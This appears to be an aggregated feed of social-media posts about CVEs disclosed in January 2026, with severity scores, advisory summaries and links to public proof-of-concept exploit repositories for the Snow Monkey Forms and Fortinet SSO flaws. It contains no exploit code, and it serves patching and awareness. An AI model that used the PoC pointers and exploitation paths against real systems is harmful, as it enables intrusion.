🟠 CVE-2025-65886 - High (7.5)

A shape mismatch vulnerability in OneFlow v0.9.0 allows attackers to cause a Denial of Service (DoS) via supplying crafted tensor shapes.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1056
(9.8 CRITICAL)

EPSS: 0.14%

updated 2026-01-29T16:31:00.867000

3 posts

The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'generate_user_dirpath' function in all versions up to, and including, 12.0.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-confi

1 repos

https://github.com/ch4r0nn/CVE-2026-1056-POC

DarkWebInformer at 2026-01-29T21:15:24.707Z ##

‼️ CVE-2026-1056: Snow Monkey Forms <= 12.0.3 - Unauthenticated Arbitrary File Deletion via Path Traversal

PoC/Exploit: github.com/ch4r0nn/CVE-2026-10

CVSS: 9.8
CVE Published: January 28th, 2026

Advisory: github.com/advisories/GHSA-g5p

Details: The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'generate_user_dirpath' function in all versions up to, and including, 12.0.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).

##

DarkWebInformer@infosec.exchange at 2026-01-29T21:15:24.000Z ##

‼️ CVE-2026-1056: Snow Monkey Forms <= 12.0.3 - Unauthenticated Arbitrary File Deletion via Path Traversal

PoC/Exploit: github.com/ch4r0nn/CVE-2026-10

CVSS: 9.8
CVE Published: January 28th, 2026

Advisory: github.com/advisories/GHSA-g5p

Details: The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'generate_user_dirpath' function in all versions up to, and including, 12.0.3. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).

##

thehackerwire@mastodon.social at 2026-01-28T13:55:47.000Z ##

🔴 CVE-2026-1056 - Critical (9.8)

The Snow Monkey Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'generate_user_dirpath' function in all versions up to, and including, 12.0.3. This makes it possible for unauthent...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-57283
(7.8 HIGH)

EPSS: 0.11%

updated 2026-01-29T16:31:00.867000

2 posts

The Node.js package browserstack-local 1.5.8 contains a command injection vulnerability. This occurs because the logfile variable is not properly sanitized in lib/Local.js.

thehackerwire@mastodon.social at 2026-01-29T17:02:49.000Z ##

🟠 CVE-2025-57283 - High (7.8)

The Node.js package browserstack-local 1.5.8 contains a command injection vulnerability. This occurs because the logfile variable is not properly sanitized in lib/Local.js.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T17:02:49.000Z ##

🟠 CVE-2025-57283 - High (7.8)

The Node.js package browserstack-local 1.5.8 contains a command injection vulnerability. This occurs because the logfile variable is not properly sanitized in lib/Local.js.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-61140
(9.8 CRITICAL)

EPSS: 0.02%

updated 2026-01-29T16:31:00.867000

2 posts

The value function in jsonpath 1.1.1 lib/index.js is vulnerable to Prototype Pollution.

thehackerwire@mastodon.social at 2026-01-29T17:02:39.000Z ##

🔴 CVE-2025-61140 - Critical (9.8)

The value function in jsonpath 1.1.1 lib/index.js is vulnerable to Prototype Pollution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T17:02:39.000Z ##

🔴 CVE-2025-61140 - Critical (9.8)

The value function in jsonpath 1.1.1 lib/index.js is vulnerable to Prototype Pollution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-62514
(8.3 HIGH)

EPSS: 0.00%

updated 2026-01-29T16:31:00.867000

2 posts

Parsec is a cloud-based application for cryptographically secure file sharing. In versions on the 3.x branch prior to 3.6.0, `libparsec_crypto`, a component of the Parsec application, does not check for weak order point of Curve25519 when compiled with its RustCrypto backend. In practice this means an attacker in a man-in-the-middle position would be able to provide weak order points to both parti

thehackerwire@mastodon.social at 2026-01-29T17:00:13.000Z ##

🟠 CVE-2025-62514 - High (8.3)

Parsec is a cloud-based application for cryptographically secure file sharing. In versions on the 3.x branch prior to 3.6.0, `libparsec_crypto`, a component of the Parsec application, does not check for weak order point of Curve25519 when compiled...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T17:00:13.000Z ##

🟠 CVE-2025-62514 - High (8.3)

Parsec is a cloud-based application for cryptographically secure file sharing. In versions on the 3.x branch prior to 3.6.0, `libparsec_crypto`, a component of the Parsec application, does not check for weak order point of Curve25519 when compiled...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-7714
(7.5 HIGH)

EPSS: 0.00%

updated 2026-01-29T16:31:00.867000

2 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Global Interactive Design Media Software Inc. Content Management System (CMS) allows Command Line Execution through SQL Injection.This issue affects Content Management System (CMS): through 21072025.

thehackerwire@mastodon.social at 2026-01-29T16:00:22.000Z ##

🟠 CVE-2025-7714 - High (7.5)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Global Interactive Design Media Software Inc. Content Management System (CMS) allows Command Line Execution through SQL Injection.This issue affe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T16:00:22.000Z ##

🟠 CVE-2025-7714 - High (7.5)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Global Interactive Design Media Software Inc. Content Management System (CMS) allows Command Line Execution through SQL Injection.This issue affe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-7713
(7.5 HIGH)

EPSS: 0.00%

updated 2026-01-29T16:31:00.867000

2 posts

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Global Interactive Design Media Software Inc. Content Management System (CMS) allows XSS Through HTTP Headers.This issue affects Content Management System (CMS): through 21072025.

thehackerwire@mastodon.social at 2026-01-29T16:00:11.000Z ##

🟠 CVE-2025-7713 - High (7.5)

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Global Interactive Design Media Software Inc. Content Management System (CMS) allows XSS Through HTTP Headers.This issue affects Content M...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T16:00:11.000Z ##

🟠 CVE-2025-7713 - High (7.5)

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Global Interactive Design Media Software Inc. Content Management System (CMS) allows XSS Through HTTP Headers.This issue affects Content M...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1616
(7.5 HIGH)

EPSS: 0.00%

updated 2026-01-29T16:31:00.867000

2 posts

The $uri$args concatenation in nginx configuration file present in Open Security Issue Management (OSIM) prior v2025.9.0 allows path traversal attacks via query parameters.

thehackerwire@mastodon.social at 2026-01-29T14:27:04.000Z ##

🟠 CVE-2026-1616 - High (7.5)

The $uri$args concatenation in nginx configuration file present in Open Security Issue Management (OSIM) prior v2025.9.0 allows path traversal attacks via query parameters.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T14:27:04.000Z ##

🟠 CVE-2026-1616 - High (7.5)

The $uri$args concatenation in nginx configuration file present in Open Security Issue Management (OSIM) prior v2025.9.0 allows path traversal attacks via query parameters.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-7016
(8.0 HIGH)

EPSS: 0.05%

updated 2026-01-29T16:31:00.867000

2 posts

Improper Access Control vulnerability in Akın Software Computer Import Export Industry and Trade Ltd. QR Menu allows Authentication Abuse.This issue affects QR Menu: before s1.05.12.

thehackerwire@mastodon.social at 2026-01-29T12:22:53.000Z ##

🟠 CVE-2025-7016 - High (8)

Improper Access Control vulnerability in Akın Software Computer Import Export Industry and Trade Ltd. QR Menu allows Authentication Abuse.This issue affects QR Menu: before s1.05.12.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T12:22:53.000Z ##

🟠 CVE-2025-7016 - High (8)

Improper Access Control vulnerability in Akın Software Computer Import Export Industry and Trade Ltd. QR Menu allows Authentication Abuse.This issue affects QR Menu: before s1.05.12.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24856
(7.8 HIGH)

EPSS: 0.02%

updated 2026-01-29T16:31:00.867000

1 posts

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Versions prior to 2.3.1.2 have an undefined behavior issue when floating-point NaN values are converted to unsigned short integer types during ICC profile XML parsing potentially corrupting memory structures and enabling arbitrary code execution. This vulnera

thehackerwire@mastodon.social at 2026-01-28T21:59:58.000Z ##

🟠 CVE-2026-24856 - High (7.8)

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Versions prior to 2.3.1.2 have an undefined behavior issue when floating-point NaN values are converted to...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33217
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:00.867000

2 posts

NVIDIA Display Driver for Windows contains a vulnerability where an attacker could trigger a use after free. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and information disclosure.

AAKL@infosec.exchange at 2026-01-28T21:08:51.000Z ##

New.

NVIDIA GPU Display Drivers - January 2026 vulnerabilities: CVE-2025-33217, CVE-2025-33218, and CVE-2025-33219 nvidia.custhelp.com/app/answer #Nvidia #infosec #vulnerability

##

thehackerwire@mastodon.social at 2026-01-28T19:00:35.000Z ##

🟠 CVE-2025-33217 - High (7.8)

NVIDIA Display Driver for Windows contains a vulnerability where an attacker could trigger a use after free. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, and ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33218
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:00.867000

2 posts

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys), where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, or information disclosure.

AAKL@infosec.exchange at 2026-01-28T21:08:51.000Z ##

New.

NVIDIA GPU Display Drivers - January 2026 vulnerabilities: CVE-2025-33217, CVE-2025-33218, and CVE-2025-33219 nvidia.custhelp.com/app/answer #Nvidia #infosec #vulnerability

##

thehackerwire@mastodon.social at 2026-01-28T19:00:45.000Z ##

🟠 CVE-2025-33218 - High (7.8)

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys), where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to code execution, escalation of privi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33219
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:00.867000

2 posts

NVIDIA Display Driver for Linux contains a vulnerability in the NVIDIA kernel module where an attacker could cause an integer overflow or wraparound. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, or information disclosure.

AAKL@infosec.exchange at 2026-01-28T21:08:51.000Z ##

New.

NVIDIA GPU Display Drivers - January 2026 vulnerabilities: CVE-2025-33217, CVE-2025-33218, and CVE-2025-33219 nvidia.custhelp.com/app/answer #Nvidia #infosec #vulnerability

##

thehackerwire@mastodon.social at 2026-01-28T19:00:55.000Z ##

🟠 CVE-2025-33219 - High (7.8)

NVIDIA Display Driver for Linux contains a vulnerability in the NVIDIA kernel module where an attacker could cause an integer overflow or wraparound. A successful exploit of this vulnerability might lead to code execution, escalation of privileges...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-46691
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:00.867000

1 posts

Dell PremierColor Panel Driver, versions prior to 1.0.0.1 A01, contains an Improper Access Control vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges.

thehackerwire@mastodon.social at 2026-01-28T20:58:33.000Z ##

🟠 CVE-2025-46691 - High (7.8)

Dell PremierColor Panel Driver, versions prior to 1.0.0.1 A01, contains an Improper Access Control vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of Privileges.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-68662
(7.6 HIGH)

EPSS: 0.04%

updated 2026-01-29T16:31:00.867000

1 posts

Discourse is an open source discussion platform. In versions prior to 3.5.4, 2025.11.2, 2025.12.1, and 2026.1.0, a hostname validation issue in FinalDestination could allow bypassing SSRF protections under certain conditions. This issue is patched in versions 3.5.4, 2025.11.2, 2025.12.1, and 2026.1.0. No known workarounds are available.

thehackerwire@mastodon.social at 2026-01-28T20:58:24.000Z ##

🟠 CVE-2025-68662 - High (7.6)

Discourse is an open source discussion platform. In versions prior to 3.5.4, 2025.11.2, 2025.12.1, and 2026.1.0, a hostname validation issue in FinalDestination could allow bypassing SSRF protections under certain conditions. This issue is patched...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-57795
(9.9 CRITICAL)

EPSS: 0.23%

updated 2026-01-29T16:31:00.867000

2 posts

Explorance Blue versions prior to 8.14.13 contain an authenticated remote file download vulnerability in a web service component. In default configurations, this flaw can be leveraged to achieve remote code execution.

thehackerwire@mastodon.social at 2026-01-28T20:07:26.000Z ##

🔴 CVE-2025-57795 - Critical (9.9)

Explorance Blue versions prior to 8.14.13 contain an authenticated remote file download vulnerability in a web service component. In default configurations, this flaw can be leveraged to achieve remote code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T20:06:46.000Z ##

🔴 CVE-2025-57795 - Critical (9.9)

Explorance Blue versions prior to 8.14.13 contain an authenticated remote file download vulnerability in a web service component. In default configurations, this flaw can be leveraged to achieve remote code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-57794
(9.1 CRITICAL)

EPSS: 0.26%

updated 2026-01-29T16:31:00.867000

2 posts

Explorance Blue versions prior to 8.14.9 contain an authenticated unrestricted file upload vulnerability in the administrative interface. The application does not adequately restrict uploaded file types, allowing malicious files to be uploaded and executed by the server. This condition enables remote code execution under default configurations.

thehackerwire@mastodon.social at 2026-01-28T20:07:16.000Z ##

🔴 CVE-2025-57794 - Critical (9.1)

Explorance Blue versions prior to 8.14.9 contain an authenticated unrestricted file upload vulnerability in the administrative interface. The application does not adequately restrict uploaded file types, allowing malicious files to be uploaded and...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T20:06:43.000Z ##

🔴 CVE-2025-57794 - Critical (9.1)

Explorance Blue versions prior to 8.14.9 contain an authenticated unrestricted file upload vulnerability in the administrative interface. The application does not adequately restrict uploaded file types, allowing malicious files to be uploaded and...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24772
(8.9 HIGH)

EPSS: 0.02%

updated 2026-01-29T16:31:00.867000

1 posts

OpenProject is an open-source, web-based project management software. To enable the real time collaboration on documents, OpenProject 17.0 introduced a synchronization server. The OpenPrioject backend generates an authentication token that is currently valid for 24 hours, encrypts it with a shared secret only known to the synchronization server. The frontend hands this encrypted token and the back

thehackerwire@mastodon.social at 2026-01-28T19:47:52.000Z ##

🟠 CVE-2026-24772 - High (8.9)

OpenProject is an open-source, web-based project management software. To enable the real time collaboration on documents, OpenProject 17.0 introduced a synchronization server. The OpenPrioject backend generates an authentication token that is curr...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33220
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:00.867000

1 posts

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where a malicious guest could cause heap memory access after the memory is freed. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, or information disclosure.

thehackerwire@mastodon.social at 2026-01-28T19:04:04.000Z ##

🟠 CVE-2025-33220 - High (7.8)

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where a malicious guest could cause heap memory access after the memory is freed. A successful exploit of this vulnerability might lead to code execution, escalation of priv...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-58150
(8.8 HIGH)

EPSS: 0.01%

updated 2026-01-29T16:31:00.867000

1 posts

Shadow mode tracing code uses a set of per-CPU variables to avoid cumbersome parameter passing. Some of these variables are written to with guest controlled data, of guest controllable size. That size can be larger than the variable, and bounding of the writes was missing.

thehackerwire@mastodon.social at 2026-01-28T17:17:54.000Z ##

🟠 CVE-2025-58150 - High (8.8)

Shadow mode tracing code uses a set of per-CPU variables to avoid
cumbersome parameter passing. Some of these variables are written to
with guest controlled data, of guest controllable size. That size can
be larger than the variable, and boundin...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24858
(9.8 CRITICAL)

EPSS: 3.33%

updated 2026-01-29T13:16:51.047000

14 posts

An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0.15, FortiManager 7.6.0 through 7.6.5, FortiManager 7.4.0 through 7.4.9, FortiManager 7.2.0 through 7.2.11, FortiManager 7.0.0 through 7.0.15, FortiOS 7.

4 repos

https://github.com/absholi7ly/CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass

https://github.com/m0d0ri205/CVE-2026-24858

https://github.com/SimoesCTT/-CTT-NSP-Convergent-Time-Theory---Network-Stack-Projection-CVE-2026-24858-

https://github.com/b1gchoi/CVE-2026-24858

cyberveille@mastobot.ping.moi at 2026-01-30T08:30:04.000Z ##

📢 Fortinet corrige le zero-day CVE-2026-24858 dans FortiCloud SSO exploité activement
📝 Selon Help Net Security, Fortinet a commencé à diffuser des versions de FortiOS corrig...
📖 cyberveille : cyberveille.ch/posts/2026-01-3
🌐 source : helpnetsecurity.com/2026/01/28
#CVE_2026_24858 #FortiCloud_SSO #Cyberveille

##

cjust at 2026-01-29T20:39:25.724Z ##

Another day and, well . . .

esecurityplanet.com/threats/fo

##

termsofsurrender@mastodon.social at 2026-01-29T10:20:48.000Z ##

Fortinet SSO Is A Burning Trash Fire While Prague Bureaucrats Wait For Their Morning Fax
PANIC 88% | Lag 18.75h | Fortinet has released an emergency patch for CVE-2026-24858, a critical vulnerability in FortiOS Sin
#AfterShockIndex

Read: hodl.cz/as-102352

##

cjust@infosec.exchange at 2026-01-29T20:39:25.000Z ##

Another day and, well . . .

#Fortinet #FortinetSSO #CVE #CVE202624858

esecurityplanet.com/threats/fo

##

termsofsurrender@mastodon.social at 2026-01-29T10:20:48.000Z ##

Fortinet SSO Is A Burning Trash Fire While Prague Bureaucrats Wait For Their Morning Fax
PANIC 88% | Lag 18.75h | Fortinet has released an emergency patch for CVE-2026-24858, a critical vulnerability in FortiOS Sin
#AfterShockIndex

Read: hodl.cz/as-102352

##

youranonnewsirc@nerdculture.de at 2026-01-29T09:24:20.000Z ##

Here's a summary of the latest in global technology and cybersecurity from the last 24 hours:

Global tech giants are streamlining: Amazon announced 16,000 job cuts (Jan 28, 2026). Meanwhile, AI investment surges, with SoftBank nearing a $30B OpenAI investment (Jan 28, 2026). In cybersecurity, Fortinet addressed active exploitation of CVE-2026-24858 (Jan 28, 2026), and OpenSSL patched 12 flaws, including RCE (Jan 29, 2026). The Illinois Department of Human Services suffered a data breach impacting ~700,000 individuals (Jan 28, 2026).

#News #Anonymous #AnonNews_irc

##

beyondmachines1@infosec.exchange at 2026-01-28T20:01:04.000Z ##

Fortinet Patches Critical FortiOS SSO Authentication Bypass Under Active Attack

Fortinet patched a critical authentication bypass vulnerability (CVE-2026-24858) in FortiOS and related products that attackers are actively exploiting to hijack devices and steal configurations. CISA has mandated federal agencies to remediate the flaw by end of January 2026.

**Make sure all your Fortinet devices are isolated from the internet and accessible from trusted networks only. If you use FortiCloud SSO, you must upgrade your firmware immediately because Fortinet has blocked vulnerable versions from using the SSO service.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

AAKL@infosec.exchange at 2026-01-28T19:29:28.000Z ##

Looks like Fortinet got the attention it was looking for.

New.

CISA: Fortinet Releases Guidance to Address Ongoing Exploitation of Authentication Bypass Vulnerability CVE-2026-24858 cisa.gov/news-events/alerts/20 #CISA #Fortinet #infosec #vulnerability

##

cecallihelper.bsky.social@bsky.brid.gy at 2026-01-28T16:55:09.750Z ##

#CISA Cyber Security Alerts & Advisories includes 26 Jan 2026 "five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog" & 27 Jan. Fortinet "CVE-2026-24858 Multiple Products Authentication Bypass" www.cisa.gov/news-events/... #cybersec #natsec #tech policy

##

technadu@infosec.exchange at 2026-01-28T15:10:44.000Z ##

Fortinet confirms active exploitation of FortiCloud SSO auth bypass (CVE-2026-24858, CVSS 9.4).
Cross-customer access via trusted SSO paths observed.

SSO now blocked for vulnerable versions - patching required.

technadu.com/fortinet-temporar

#InfoSec #Fortinet #CVE #IdentitySecurity

##

benzogaga33@mamot.fr at 2026-01-28T10:40:03.000Z ##

Fortinet coupe le SSO en attendant les patchs pour la nouvelle faille zero-day : CVE-2026-24858 it-connect.fr/fortinet-coupe-l #ActuCybersécurité #Cybersécurité #Vulnérabilité #Fortinet

##

youranonnewsirc@nerdculture.de at 2026-01-28T09:24:26.000Z ##

Here's a summary of recent important global, technology, and cybersecurity news:

Global: India has contained a Nipah virus outbreak (Jan 28, 2026). The EU approved a ban on Russian gas imports, effective from 2027 (Jan 27, 2026).

Technology: The EU is pressing Google to share AI and search data under new regulations (Jan 27, 2026). Samsung is nearing Nvidia approval for advanced HBM4 AI memory chips (Jan 27, 2026). Fujitsu developed AI for space weather prediction (Jan 28, 2026).

Cybersecurity: Microsoft issued emergency patches for an actively exploited Office zero-day vulnerability (CVE-2026-21509) (Jan 27, 2026). Fortinet patched a critical FortiOS SSO authentication bypass (CVE-2026-24858) under active exploitation (Jan 28, 2026). AI-powered polymorphic phishing attacks are also a growing concern (Jan 28, 2026).

#News #Anonymous #AnonNews_irc

##

DarkWebInformer@infosec.exchange at 2026-01-28T00:01:39.000Z ##

‼️CVE-2026-24858: Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability

Severity: Critical
CVSS: 9.8
Zero Day: Yes
CVE Published: January 27th, 2026

Advisory: github.com/advisories/GHSA-2x3

An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0.15, FortiManager 7.6.0 through 7.6.5, FortiManager 7.4.0 through 7.4.9, FortiManager 7.2.0 through 7.2.11, FortiManager 7.0.0 through 7.0.15, FortiOS 7.6.0 through 7.6.5, FortiOS 7.4.0 through 7.4.10, FortiOS 7.2.0 through 7.2.12, FortiOS 7.0.0 through 7.0.18 may allow an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.

##

thehackerwire@mastodon.social at 2026-01-27T20:17:52.000Z ##

🔴 CVE-2026-24858 - Critical (9.8)

An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24428
(8.8 HIGH)

EPSS: 0.04%

updated 2026-01-29T13:02:04.990000

2 posts

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain an authorization flaw in the user management API that allows a low-privileged authenticated user to change the administrator account password. By sending a crafted request directly to the backend endpoint, an attacker can bypass role-based restrictions enforced by the web interface and obtain full administrative

thehackerwire@mastodon.social at 2026-01-29T13:09:58.000Z ##

🟠 CVE-2026-24428 - High (8.8)

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain an authorization flaw in the user management API that allows a low-privileged authenticated user to change the administrator account password. By sending a craf...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T13:09:58.000Z ##

🟠 CVE-2026-24428 - High (8.8)

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain an authorization flaw in the user management API that allows a low-privileged authenticated user to change the administrator account password. By sending a craf...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24429
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-01-29T13:01:22.300000

2 posts

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) ship with a predefined default password for a built-in authentication account that is not required to be changed during initial configuration. An attacker can leverage these default credentials to gain authenticated access to the management interface.

thehackerwire@mastodon.social at 2026-01-29T13:10:08.000Z ##

🔴 CVE-2026-24429 - Critical (9.8)

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) ship with a predefined default password for a built-in authentication account that is not required to be changed during initial configuration. An attacker can leverage ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-29T13:10:08.000Z ##

🔴 CVE-2026-24429 - Critical (9.8)

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) ship with a predefined default password for a built-in authentication account that is not required to be changed during initial configuration. An attacker can leverage ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23830
(10.0 CRITICAL)

EPSS: 0.15%

updated 2026-01-29T03:43:44

1 posts

### Summary A sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction` ### Details The library attempts to sandbox code execution by replacing the global `Function` constructor with a safe, sandboxed version (`SandboxFunction`). This is handled in `utils.ts` by mapping `Function` to `sandboxFunction` within a map used for lookups. However, the library did not

thehackerwire@mastodon.social at 2026-01-28T00:46:49.000Z ##

🔴 CVE-2026-23830 - Critical (10)

SandboxJS is a JavaScript sandboxing library. Versions prior to 0.8.26 have a sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`. The library attempts to sandbox code execution by replacing the global `Func...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24765
(7.8 HIGH)

EPSS: 0.08%

updated 2026-01-29T03:43:28

2 posts

### Overview A vulnerability has been discovered involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists in the `cleanupForCoverage()` method, which deserializes code coverage files without validation, potentially allowing remote code execution if malicious `.coverage` files are present prior to the execution of the PHPT test. ### Technical Details

thehackerwire@mastodon.social at 2026-01-27T23:02:16.000Z ##

🟠 CVE-2026-24765 - High (7.8)

PHPUnit is a testing framework for PHP. A vulnerability has been discovered in versions prior to 12.5.8, 11.5.50, 10.5.62, 9.6.33, and 8.5.52 involving unsafe deserialization of code coverage data in PHPT test execution. The vulnerability exists i...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

sebastian@phpc.social at 2026-01-27T15:27:14.000Z ##

RE: phpc.social/@sebastian/1159657

This is CVE-2026-24765 now.

##

CVE-2026-24747
(8.8 HIGH)

EPSS: 0.02%

updated 2026-01-29T03:42:53

1 posts

